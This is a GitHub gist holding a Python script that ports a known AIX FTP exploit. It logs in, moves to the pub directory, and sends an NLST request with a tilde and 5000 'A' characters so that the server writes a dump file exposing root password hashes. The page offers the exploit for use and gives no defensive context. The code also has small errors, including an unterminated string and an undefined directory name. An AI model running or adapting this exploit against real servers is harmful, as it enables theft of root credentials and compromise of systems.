Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
rewrite of Kingcopes AIX FTP root hash disclosure vuln
#!/usr/bin/python
###################
#
#
#
# Rewrite of Kingcopes AIX FTP root hash disclosure vuln
# Conversion by GraphX
# Because fuck Perl
#
#######################################################
from ftplib import FTP
import io
import os
import sys, getopt
def main (argv):
host = ''
user = ''
password = ''
try:
opts, args = getopt.getopt(argv,"h:u:p:",["host=","user=","password="])
except getopt.GetoptError:
print 'ftpdump.py usage: ftpdump.py -h <host> -u <username> -p <password>
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
host = arg
elif opt == '-u':
user = arg
elif opt == '-p':
password = arg
fexploit(host,user,password)
def fexploit(h,u,p):
buff = 'A'*5000
ftp = FTP(h)
try:
print '[*] attempting FTP login'
ftp.login(u,p)
print '[*] using pub directory'
ftp.cwd(pub)
print '[*] attempting to trigger vulnerability'
ftp.nlst('~' + buff)
print '[*] no errors, I think we\'re good. Go look for that dump file'
except Exception, e:
print str(e)
if __name__ == "__main__":
main(sys.argv[1:])
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment